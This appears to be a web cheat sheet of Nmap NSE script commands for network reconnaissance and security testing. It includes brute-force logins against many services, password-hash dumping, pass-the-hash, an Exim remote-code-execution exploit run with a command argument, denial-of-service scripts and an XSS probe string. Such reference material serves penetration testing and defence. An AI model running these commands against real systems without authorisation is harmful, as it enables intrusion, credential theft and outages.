using NSE scripts
The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write and share scripts to automate a wide variety of networking tasks.
Those scripts are written in the embedded Lua programming language and they are executed in parallel.
Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.
You can find here the official Nmap NSE Scripts and LUA Libraries Portal, where you can browse and download the scripts by categories or by alphabetically name.
You can find below many useful examples of running Nmap scans by using NSE scripts.
Sniffer Detection on the Specified File Containing a List of IP Addresses:
nmap-script sniffer-detect -iL IPList.txt -osniffer-detect.txt
Perform a Firewalking (Discover Firewall Rules using an IP TTL Expiration Technique):
nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>
Detects a Vulnerability in Netfilter and other Firewalls that use Helpers to dynamically Open Ports for Protocols, such as FTP and SIP:
nmap --script firewall-bypass <target>
nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 <target>
Perform a DNS Fuzzing Attack against DNS Server:
nmap --script dns-fuzz --script-args timelimit=2h 192.168.101.9
Perform a Form Fuzzing against Forms on WebSites:
nmap --script http-form-fuzzer -p 80 192.168.101.9
Crawls a Web Server and Sends an Attack Vector/Probe to Find PHP Files Vulnerable to Reflected Cross Site Scripting via the variable $_SERVER["PHP_SELF"],
PHP_SELF XSS Refers to Vulnerabilities caused by the Lack of Sanitation of the variable $_SERVER["PHP_SELF"] commonly used in PHP Scripts that display forms:
The Vector/Probe Attack used is /'"/><script>alert(1)</script>
nmap --script=http-phpself-xss -p80 <target>
nmap -sV --script http-self-xss <target>
Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369):
nmap -sV --script realvnc-auth-bypass.nse 192.168.101.3
nmap -sV -sC --script realvnc-auth-bypass 192.168.101.3
Oracle 11g Users Scan (bug fixed in Oracle's October 2009 Critical Patch Update):
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 192.168.101.25
Dumps the Password Hashes from an MySQL Server in a Format Suitable for Cracking by Tools such as John-the-ripper:
nmap -p 3306 192.168.101.9 --script mysql-dump-hashes --script-args='username=root,password=secret'
MySQL Server Users Scan:
nmap -sV --script mysql-users 192.168.101.9
Brute Force Passwords MySQL:
nmap --script=mysql-brute 192.168.101.9
Run a Query against a MySQL Database and Returns the Results as a Table:
nmap -p 3306 192.168.101.9 --script mysql-query --script-args='query="SELECT * FROM table_name WHERE (userID LIKE '%ELM%');"[,username=root,password=secret]'
nmap -p 3306 192.168.101.9 --script mysql-query --script-args='query="GRANT ALL PRIVILEGES ON db_base.* TO db_user @'%' IDENTIFIED BY 'db_passwd';"[,username=root,password=secret]'
nmap -p 3306 192.168.101.9 --script mysql-query --script-args='query="INSERT INTO table_name (status, permissions) VALUES ('OK','ALL') WHERE (userID LIKE '%ELM%');"[,username=root,password=secret]'
Dumps the Password Hashes from an Microsoft SQL Server (ms-sql) in a Format Suitable for Cracking by Tools such as John-the-ripper:
nmap -p 1433 192.168.101.5 --script ms-sql-dump-hashes
Attempts to Authenticate to Microsoft SQL Servers using an Empty Password for the Sysadmin (sa) Account:
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all 192.168.101.5
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-name=PRDB,mssql.instance-port=1432 192.168.101.5
nmap -p 1433 --script ms-sql-empty-password 192.168.101.5
Queries Microsoft SQL Server (ms-sql) Instances for a List of Databases a User has Access to:
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa 192.168.101.5
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-all 192.168.101.5
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-name=PRDB,mssql.instance-port=1432 192.168.101.5
Retrieves the Authentication Scheme and Realm of a Web Service that Requires Authentication:
nmap --script http-auth [--script-args http-auth.path=/login] -p80 192.168.101.45
Scan for Access with Default Credentials used by a variety of Web Applications and Devices:
nmap -p80 --script http-default-accounts 192.168.101.45
Scan for a JBoss Server is Vulnerable to JMX Console Authentication Bypass (CVE-2010-0738):
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' 192.168.101.45
Discovers Valid Usernames by Brute-Force Querying Likely Usernames against a Kerberos Service:
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
Checks Target IP Addresses against Multiple DNS Anti-Spam and Open Proxy Blacklists and Returns a List of Services for which an IP has been Flagged.
Checks may be Limited by Service Category (eg: SPAM, PROXY) or to a Specific Service Name.
nmap --script dns-blacklist --script-args='dns-blacklist.ip=192.168.101.45'
nmap -sn 192.168.101.45 --script dns-blacklist
Detects whether the Remote Device has IP Forwarding or "Internet Connection Sharing" Enabled, by Sending an ICMP Echo Request to a Given Target using the Scanned Host as Default Gateway:
nmap -sn 192.168.101.145 --script ip-forwarding --script-args='target=www.example.com'
Extracts a List of Citrix Servers from the ICA Browser Service:
nmap -sU --script=citrix-enum-servers -p 1604
Extracts a List of Applications, ACLs, and Settings from the Citrix XML Service:
nmap --script=citrix-enum-apps-xml -p 80,443,8080 192.168.101.45
Check if ePO Agent is Running on Port 8081 or Port Identified as ePO Agent Port:
nmap -sV --script=mcafee-epo-agent 192.168.101.45
Check Presence of ms12-020 RDP vulnerability:
nmap –sC –p 3389 –vv –script-trace –script ms12-020-rev.nse 192.168.10.10
Attempts to Perform an LDAP Search and Returns All Matches:
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.101.45
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows *Server*",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' 192.168.101.45
Retrieves the LDAP Root DSA-Specific Entry (DSE):
nmap -p 389 --script ldap-rootdse 192.168.101.45
Lists Remote File Systems by Querying the Remote Device using the Network Data Management Protocol (ndmp).
NDMP is a Protocol Intended to Transport Data Between a NAS Device and the Backup Device, Removing the Need for the Data to Pass through the Backup Server.
nmap -p 10000 --script ndmp-fs-info
Retrieves Configuration Information from a Lexmark S300-S400:
nmap -sV --script=lexmark-config 192.168.101.45 192.168.101.45
Lotus Domino Users Scan:
nmap --script domino-enum-users -p 1352 192.168.101.145
Scan for an identd (auth) Server which is Spoofing its Replies:
nmap -sV --script=auth-spoof 192.168.101.145
Looks for Signature of Known Server Compromises
http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/.
nmap -sV --script=http-malware-host 192.168.101.145
Checks if Hosts are on Google's Blacklist of Suspected Malware and Phishing Servers.
The script queries the Google's Safe Browsing service and you need to have your own API key to access Google's Safe Browsing Lookup services.
Sign up for yours at http://code.google.com/apis/safebrowsing/key_signup.html.
nmap -p80 --script http-google-malware 192.168.101.145
Scan for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523):
nmap --script ftp-vsftpd-backdoor -p 21 192.168.101.145
Scan for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562:
nmap --script ftp-proftpd-backdoor -p 21 192.168.101.145
Brute Force Password Scan against the WinPcap Remote Capture Daemon (rpcap):
nmap -p 2002 192.168.101.145 --script rpcap-brute
Brute Force Password Scan against rsync:
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.101.145
Brute Force Password Scan against the VMWare Authentication Daemon (vmware-authd):
nmap -p 902 192.168.101.145 --script vmauthd-brute
Brute Force Password Scan against VNC Servers:
nmap --script vnc-brute -p 5900 192.168.101.145
Brute Force Password Scan against SMTP using LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM:
nmap -p 25 --script smtp-brute 192.168.101.145
Brute Force Password Scan against rlogin service:
nmap -p 513 --script rlogin-brute 192.168.101.145
Brute Force Password Scan against POP3 Servers using either "USER" (default), "SASL-PLAIN", "SASL-LOGIN", "SASL-CRAM-MD5", or "APOP":
nmap -sV --script=pop3-brute 192.168.101.145
Brute Force Password Scan against IMAP Servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM Authentication:
nmap -p 143,993 --script imap-brute 192.168.101.145
Scan for and/or Exploits a Heap Overflow within Versions of Exim prior to 4.69 (CVE-2010-4344) and a Privilege Escalation Vulnerability in Exim 4.72 and below (CVE-2010-4345).
The heap overflow vulnerability allows remote attackers to execute arbitrary code with the privileges of the Exim daemon (CVE-2010-4344). If the exploit fails then the Exim smtpd child will be killed (heap corruption).
The privilege escalation vulnerability allows the exim user to gain root privileges by specifying an alternate configuration file using the -C option (CVE-2010-4345).
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 192.168.101.145
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 192.168.101.145
Detects PHP-CGI Installations Vulnerable to CVE-2012-1823, a Critical Vulnerability that Allows Attackers to Retrieve Source Code and Execute Code Remotely.
The script works by appending "?-s" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern "<span style=.*><?" to detect vulnerable installations.
nmap -sV --script http-vuln-cve2012-1823 192.168.101.145
nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php 192.168.101.145
Scan a Web Server for Slowloris DoS attack Vulnerability:
nmap --script http-slowloris --max-parallelism 400 192.168.101.145
Exhausts a Remote SMB Server's Connection Limit by Opening as Many Connections as we can.
Most implementations of SMB have a Hard Global Limit of 11 Connections for User Accounts and 10 Connections for anonymous.
Once that Limit is rReached, further Connections are Denied. This Script Exploits that Limit by taking up All the Connections and Holding them.
This works better with a valid user account, because Windows reserves one slot for valid users.
nmap --script smb-flood.nse -p445 192.168.101.145
nmap -sU -sS --script smb-flood.nse -p U:137,T:139 192.168.101.145
Detects Huawei Modems Models HG530x, HG520x, HG510x (and others...) Vulnerable to a Remote Credential and Information Disclosure Vulnerability. It also Extracts the PPPoE Credentials and Other interesting Configuration Values.
nmap -p80 --script http-huawei-hg5xx-vuln <target>
nmap -sV http-huawei-hg5xx-vuln <target>
Scan to Discover Hosts in the Local Network using the DNS Service Discovery protocol and Sends a NULL UDP Packet to Each Host to Test if it's Vulnerable to the Avahi NULL UDP Packet Denial Of Service (CVE-2011-1002):
nmap --script=broadcast-avahi-dos
Exploits the CVE-2012-3137 Vulnerability, a Weakness in Oracle's O5LOGIN Authentication Scheme:
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL 192.168.101.145
Guesses Oracle Instance/SID Names against the TNS-Listener:
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 192.168.101.145
nmap --script=oracle-sid-brute -p 1521-1560 192.168.101.145
Brute Force Password Scan against Nessus Vulnerability Scanning Daemon using the NTP 1.2 Protocol:
nmap --script nessus-brute -p 1241 192.168.101.145
acarsd Scan on the Specified Port and Host/Network:
nmap --script acarsd-info --script-args "acarsd-info.timeout=10,acarsd-info.bytes=512" -p <port> 192.168.101.145
Brute Force Password Scan against FTP Server:
nmap --script ftp-brute -p 21 192.168.101.145
Scan an FTP Server for Anonymous Login:
nmap -sV --script ftp-anon 192.168.101.145
Spiders a Web Site and Collects eMail Addresses:
nmap --script=http-email-harvest 192.168.101.145
Checks for a Path-Traversal Vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733):
nmap --script http-vmware-path-vuln -p80,443,8222,8333 192.168.101.145
Retrieves Information from an Apache Hadoop Secondary NameNode HTTP Status Page:
nmap --script hadoop-secondary-namenode-info -p 50090 192.168.101.145
Retrieves Information from an Apache Hadoop NameNode HTTP Status Page:
nmap --script hadoop-namenode-info -p 50070 192.168.101.145
Discovers Hostnames that Resolve to the Target's IP Address by Querying the Robtex Service at http://www.robtex.com/dns/:
nmap --script hostmap-robtex
Retrieves the Locations of All "Find my iPhone" Enabled iOS Devices by Querying the MobileMe Web Service:
nmap -sn -Pn --script http-icloud-findmyiphone --script-args='username=<user>,password=<pass>'
Brute Force Password Scan against HTTP Server (Basic Authentication - Default Method GET):
nmap --script http-brute -p 80 192.168.101.145
Brute Force Password Scan against HTTP Server (Form-Based Authentication):
nmap --script http-form-brute -p 80 192.168.101.145
Brute Force Password Auditing against Joomla Web CMS Installations:
nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,http-joomla-brute.threads=3,brute.firstonly=true' 192.168.101.145
nmap -sV --script http-joomla-brute 192.168.101.145
Brute Force Password Scan against HTTP Proxy Server:
nmap --script http-proxy-brute -p 8080 192.168.101.145
Brute Force Password Auditing against the BackOrifice Service:
nmap -sU --script backorifice-brute 192.168.101.115 --script-args backorifice-brute.ports="U:31337,25252,151-222", "U:1024-1512"
Brute Force LDAP Authentication:
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <host>
Brute Force Password against iSCSI Target:
nmap -sV --script=iscsi-brute 192.168.101.115
Brute Force Password against Wordpress CMS/Blog Server:
nmap -sV --script http-wordpress-brute 192.168.101.115
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.101.115
Attempts to Guess Valid Credentials for the Citrix PN Web Agent XML Service:
nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443,8080 192.168.101.115
Detect Zeus Botnet (by querying ZTDNS@abuse.ch) in the Specified Network (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -v -sn -PN --script=dns-zeustracker 192.168.101.0/24
OR:
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch A
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch TXT
dig +short domain_name.uribl.zeustracker.abuse.ch A
dig +short domain_name.uribl.zeustracker.abuse.ch TXT
# The Response 127.0.0.2 means that the Domain is Listed on the ZT.
# To Check the IP address 123.124.125.126:
dig +short 126.125.124.123.ipbl.zeustracker.abuse.ch TXT
# To Check the Domain dantor777.com:
dig +short dantor777.com.uribl.zeustracker.abuse.ch A
dig +short dantor777.com.uribl.zeustracker.abuse.ch TXT
Perform a DNS Update (without Authentication):
nmap -sV --script=dns-update 192.168.1.14
Performs Password Guessing Against Apple Filing Protocol (AFP):
nmap -p 548 --script afp-brute 192.168.1.3
Shows AFP shares and ACLs:
nmap -sV --script=afp-showmount 192.168.1.3
Listens for the LAN Sync Information Broadcasts that the Dropbox.com Client Broadcasts Every 20 seconds, then Prints All the Discovered Client IP Addresses, Port Numbers, Version Numbers, Display Names, and more:
nmap -sV --script=broadcast-dropbox-listener 192.168.101.0/24
Discovers EMC Networker Backup Software Servers on a LAN by Sending a Network Broadcast Query:
nmap --script broadcast-networker-discover
Scan to Check Windows Security Mode(s) Supported (for example, if Message signing is not supported, then Man-In-The-Middle Attacks are possible):
nmap -p445 --script=smb-security-mode 192.168.101.30
Windows OS Discovery Scan:
nmap -p445 -script=smb-os-discovery 192.168.101.30
Windows Shares Enumeration Scan (Without Specifying Credentials and by Specifying a User and a Password or a Hash):
nmap -p445 --script=smb-enum-shares 192.168.101.50
by Specifying a User and a Password:
nmap -v -p445 --script=smb-enum-shares --scriptargs=smbuser=administrator,smbpass=blink182 10.0.0.0/24
by Specifying a User and a Hash with the "Passwing the Hash" technique (the Hash can be Obtained by Using fgdump or pwdump6, decrypted from the SAM file, dumped with the "smb-pwdump.nse" script):
nmap -p445 --script=smb-enum-shares --scriptargs=smbuser=administrator,smbhash=cd401a40ae92face50b8e4fe1911060e
Password Hashes dumped this way from one server can be directly used to access other servers, without cracking them. The hash can be used directly by passing a "smbhash" argument instead of "smbpass":
Brute-Force Windows Account Passwords:
nmap -p445 --script=smb-brute.nse,smb-enum-shares 10.0.0.0/24
Attempt a Brute Login through SMB Windows Account:
nmap -p445 --script=smb-brute 192.168.101.50
Windows Users Enumeration (using both SAMR and LSA):
nmap -v -p445 --script=smb-enum-users 192.168.101.50
nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 192.168.101.50
Windows Sessions Enumeration:
nmap -vv -p445 --script=smb-enum-sessions 192.168.101.50
Windows Processes Enumeration:
nmap -vv -p445 --script=smb-enum-processes --scriptargs=smbuser=test,smbpass=test 192.168.101.50
Windows System Info:
nmap -p445 --script=smb-system-info --script-args=smbuser=test,smbpass=test 192.168.101.50